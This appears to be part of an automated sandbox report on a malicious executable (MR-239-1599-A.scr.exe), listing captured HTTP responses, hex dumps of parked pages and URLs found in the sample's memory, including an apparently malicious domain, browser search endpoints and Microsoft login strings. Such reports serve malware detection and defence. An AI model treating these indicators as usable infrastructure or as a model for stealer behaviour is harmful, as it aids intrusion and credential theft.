68 65 57 69 64 74 68 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 76 70 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 63 6f 6e 74 65 6e 74 27 2c 27 77 69 64 74 68 3d 34 30 30 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 65 61 64 65 72 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 73 65 67 75 69 6d 69 65 6e 74 6f 22 3e 3c 2f 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 45 73 74 61 20 65 73 20 6c 61 20 70 26 61 61 63 75 74 65 3b 67 69 6e 61 20 64 65 3a 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 77 77 77 2e 63 6f 6c 63 68 6f 6e 64 65 6
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 May 2024 16:21:26 GMTServer: ApacheX-ServerIndex: llim604Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 65 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 63 6f 6c 63 68 6f 6e 64 65 61 6c 71 75 69 6c 65 72 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 24 52 45 47 49 53 54 52 41 4e 54 31 20 24 52 45 47 49 53 54 52 41 4e 54 32 20 24 52 45 47 49 53 54 52 41 4e 54 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 73 79 73 2e 65 73 2f 63 73 73 2f 70 61 72 6b 69 6e 67 32 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 74 68 65 57 69 64 74 68 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 73 63 72 65 65 6e 2e 77 69 64 74 68 20 3c 3d 20 34 32 30 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6d 76 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 74 
68 65 57 69 64 74 68 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 76 70 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 63 6f 6e 74 65 6e 74 27 2c 27 77 69 64 74 68 3d 34 30 30 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 65 61 64 65 72 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 73 65 67 75 69 6d 69 65 6e 74 6f 22 3e 3c 2f 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 45 73 74 61 20 65 73 20 6c 61 20 70 26 61 61 63 75 74 65 3b 67 69 6e 61 20 64 65 3a 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 77 77 77 2e 63 6f 6c 63 68 6f 6e 64 65 6
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 May 2024 16:21:29 GMTServer: ApacheX-ServerIndex: llim603Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 May 2024 16:21:51 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 May 2024 16:21:54 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 May 2024 16:21:59 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 May 2024 16:22:02 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 May 2024 16:22:17 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 May 2024 16:22:19 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 May 2024 16:22:22 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 May 2024 16:22:25 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 08 May 2024 16:22:40 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "636d2d22-e42"
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 08 May 2024 16:22:43 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "636d2d22-e42"
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 08 May 2024 16:22:46 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "636d2d22-e42"
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 08 May 2024 16:22:48 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "636d2d22-e42"
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Wed, 08 May 2024 16:23:19 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeSet-Cookie: PHPSESSID=l8olb7ovn3cj4jo296okddhtgs; path=/; domain=valentinaetommaso.it; HttpOnlyExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-Encoding: gzip
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Wed, 08 May 2024 16:23:22 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeSet-Cookie: PHPSESSID=hqf05dav11336ugatuqh0ulgaq; path=/; domain=valentinaetommaso.it; HttpOnlyExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-Encoding: gzip
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Wed, 08 May 2024 16:23:25 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeSet-Cookie: PHPSESSID=gbci7dr4gbuvpitvmsd5psuv9t; path=/; domain=valentinaetommaso.it; HttpOnlyExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-Encoding: gzip
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Wed, 08 May 2024 16:23:28 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeSet-Cookie: PHPSESSID=ap19f1kakkqqdq1kfms236rbot; path=/; domain=valentinaetommaso.it; HttpOnlyExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cache
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
                  Source: MR-239-1599-A.scr.exeString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                  Source: MR-239-1599-A.scr.exeString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                  Source: replace.exe, 00000006.00000002.4094316967.0000000004C16000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000003A66000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://fedoraproject.org/
                  Source: replace.exe, 00000006.00000002.4094316967.0000000004C16000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000003A66000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://nginx.net/
                  Source: MR-239-1599-A.scr.exeString found in binary or memory: http://ocsp.comodoca.com0
                  Source: MR-239-1599-A.scr.exe, 00000000.00000002.1653756559.0000000006E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                  Source: MR-239-1599-A.scr.exe, 00000000.00000002.1653756559.0000000006E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                  Source: MR-239-1599-A.scr.exe, 00000000.00000002.1653756559.0000000006E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                  Source: MR-239-1599-A.scr.exe, 00000000.00000002.1653756559.0000000006E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                  Source: MR-239-1599-A.scr.exe, 00000000.00000002.1653756559.0000000006E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                  Source: MR-239-1599-A.scr.exe, 00000000.00000002.1653756559.0000000006E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                  Source: MR-239-1599-A.scr.exe, 00000000.00000002.1653756559.0000000006E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                  Source: MR-239-1599-A.scr.exe, 00000000.00000002.1653756559.0000000006E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                  Source: MR-239-1599-A.scr.exe, 00000000.00000002.1653756559.0000000006E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                  Source: MR-239-1599-A.scr.exe, 00000000.00000002.1653756559.0000000006E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                  Source: MR-239-1599-A.scr.exe, 00000000.00000002.1653756559.0000000006E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                  Source: MR-239-1599-A.scr.exe, 00000000.00000002.1653756559.0000000006E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                  Source: MR-239-1599-A.scr.exe, 00000000.00000002.1653756559.0000000006E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                  Source: MR-239-1599-A.scr.exe, 00000000.00000002.1653756559.0000000006E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                  Source: MR-239-1599-A.scr.exe, 00000000.00000002.1653756559.0000000006E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                  Source: MR-239-1599-A.scr.exe, 00000000.00000002.1653756559.0000000006E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                  Source: MR-239-1599-A.scr.exe, 00000000.00000002.1653756559.0000000006E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                  Source: MR-239-1599-A.scr.exe, 00000000.00000002.1653756559.0000000006E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                  Source: MR-239-1599-A.scr.exe, 00000000.00000002.1653700434.0000000005710000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.monotype.
                  Source: MR-239-1599-A.scr.exe, 00000000.00000002.1653756559.0000000006E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                  Source: MR-239-1599-A.scr.exe, 00000000.00000002.1653756559.0000000006E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                  Source: MR-239-1599-A.scr.exe, 00000000.00000002.1653756559.0000000006E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                  Source: DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4094770900.0000000004D16000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.solesense.pro
                  Source: DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4094770900.0000000004D16000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.solesense.pro/aleu/
                  Source: MR-239-1599-A.scr.exe, 00000000.00000002.1653756559.0000000006E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                  Source: MR-239-1599-A.scr.exe, 00000000.00000002.1653756559.0000000006E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                  Source: MR-239-1599-A.scr.exe, 00000000.00000002.1653756559.0000000006E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                  Source: MR-239-1599-A.scr.exe, 00000000.00000002.1653756559.0000000006E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                  Source: replace.exe, 00000006.00000003.2159480486.0000000007F48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: replace.exe, 00000006.00000002.4094316967.00000000042AA000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.00000000030FA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://arsys.es/css/parking2.css
                  Source: replace.exe, 00000006.00000002.4094316967.0000000003DF4000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000006.00000002.4096081074.0000000006490000.00000004.00000800.00020000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000002C44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2262693951.000000003EEA4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://assets.iv.lt/default.css
                  Source: replace.exe, 00000006.00000002.4094316967.0000000003DF4000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000006.00000002.4096081074.0000000006490000.00000004.00000800.00020000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000002C44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2262693951.000000003EEA4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://assets.iv.lt/footer.html
                  Source: replace.exe, 00000006.00000002.4094316967.0000000003DF4000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000006.00000002.4096081074.0000000006490000.00000004.00000800.00020000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000002C44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2262693951.000000003EEA4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://assets.iv.lt/header.html
                  Source: firefox.exe, 0000000A.00000002.2262693951.000000003EEA4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://assets.iv.lt/images/icon.png
                  Source: firefox.exe, 0000000A.00000002.2262693951.000000003EEA4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://assets.iv.lt/images/thumbnail.png
                  Source: replace.exe, 00000006.00000003.2159480486.0000000007F48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: replace.exe, 00000006.00000003.2159480486.0000000007F48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: replace.exe, 00000006.00000003.2159480486.0000000007F48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: replace.exe, 00000006.00000002.4094316967.00000000050CC000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000003F1C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net
                  Source: replace.exe, 00000006.00000002.4094316967.00000000050CC000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000003F1C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/client/js.polyfill/container-query-polyfill.modern.js
                  Source: replace.exe, 00000006.00000002.4094316967.00000000050CC000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000003F1C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/01/01h/01hx1m.css?ph=cb3a78e957
                  Source: replace.exe, 00000006.00000002.4094316967.00000000050CC000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000003F1C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/04/04p/04pi85.css?ph=cb3a78e957
                  Source: replace.exe, 00000006.00000002.4094316967.00000000050CC000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000003F1C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/07/07f/07fzq8.svg?ph=cb3a78e957
                  Source: replace.exe, 00000006.00000002.4094316967.00000000050CC000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000003F1C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/0e/0e7/0e7xip.css?ph=cb3a78e957
                  Source: replace.exe, 00000006.00000002.4094316967.00000000050CC000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000003F1C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/0u/0ua/0ua55l.js?ph=cb3a78e957
                  Source: replace.exe, 00000006.00000002.4094316967.00000000050CC000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000003F1C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/13/13s/13s9j7.css?ph=cb3a78e957
                  Source: replace.exe, 00000006.00000002.4094316967.00000000050CC000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000003F1C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/1a/1an/1anfpg.css?ph=cb3a78e957
                  Source: DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000003F1C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/1j/1j3/1j3767.ico?ph=cb3a78e957
                  Source: replace.exe, 00000006.00000002.4094316967.00000000050CC000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000003F1C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/2d/2di/2div3h.svg?ph=cb3a78e957
                  Source: replace.exe, 00000006.00000002.4094316967.00000000050CC000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000003F1C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/2v/2v4/2v414g.css?ph=cb3a78e957
                  Source: replace.exe, 00000006.00000002.4094316967.00000000050CC000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000003F1C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/32/32i/32i65q.css?ph=cb3a78e957
                  Source: replace.exe, 00000006.00000002.4094316967.00000000050CC000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000003F1C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/3c/3cw/3cwfrk.css?ph=cb3a78e957
                  Source: replace.exe, 00000006.00000002.4094316967.00000000050CC000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000003F1C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/3f/3f9/3f9vvf.css?ph=cb3a78e957
                  Source: replace.exe, 00000006.00000002.4094316967.00000000050CC000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000003F1C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/4a/4a3/4a3t1k.css?ph=cb3a78e957
                  Source: replace.exe, 00000006.00000003.2159480486.0000000007F48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: replace.exe, 00000006.00000003.2159480486.0000000007F48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: replace.exe, 00000006.00000003.2159480486.0000000007F48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: replace.exe, 00000006.00000002.4094316967.00000000050CC000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000003F1C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://events.webnode.com/projects/-/events/
                  Source: replace.exe, 00000006.00000002.4094316967.00000000050CC000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000003F1C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com
                  Source: replace.exe, 00000006.00000002.4094316967.0000000003DF4000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000006.00000002.4096081074.0000000006490000.00000004.00000800.00020000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000002C44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2262693951.000000003EEA4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://klientams.iv.lt/
                  Source: replace.exe, 00000006.00000002.4091676054.0000000002C9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                  Source: replace.exe, 00000006.00000002.4091676054.0000000002C9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
